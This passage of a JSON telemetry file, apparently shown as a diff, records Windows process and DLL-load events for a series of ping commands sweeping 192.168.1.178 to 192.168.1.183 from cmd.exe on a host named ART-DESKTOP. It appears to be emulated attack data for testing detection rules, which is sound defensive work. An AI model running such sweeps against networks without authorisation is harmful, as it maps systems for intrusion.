"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572851980000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "event_type": "process", - "pid": 5428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572856990000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-001055455301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.178", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1916, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572857130000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1916, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857140000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857300000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857300000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572857300000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "event_type": "process", - "pid": 1916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572861830000, - "unique_pid": "{42FC7E13-CBA5-5C05-0000-0010D2475301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.179", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1544, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572861980000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "event_type": "process", - "pid": 1544, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572866990000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010294C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.180", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2784, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572867130000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867140000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572867300000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "event_type": "process", - 
"pid": 2784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572871830000, - "unique_pid": "{42FC7E13-CBA6-5C05-0000-0010A54E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.181", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2228, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572871980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - 
"unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572871990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "event_type": "process", - "pid": 2228, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572876840000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001019515301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.182", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5736, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": 
"{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572876980000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "event_type": "process", - "pid": 5736, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572881990000, - "unique_pid": "{42FC7E13-CBA7-5C05-0000-001096535301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.183", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572882140000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "event_type": "process", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572886830000, - "unique_pid": 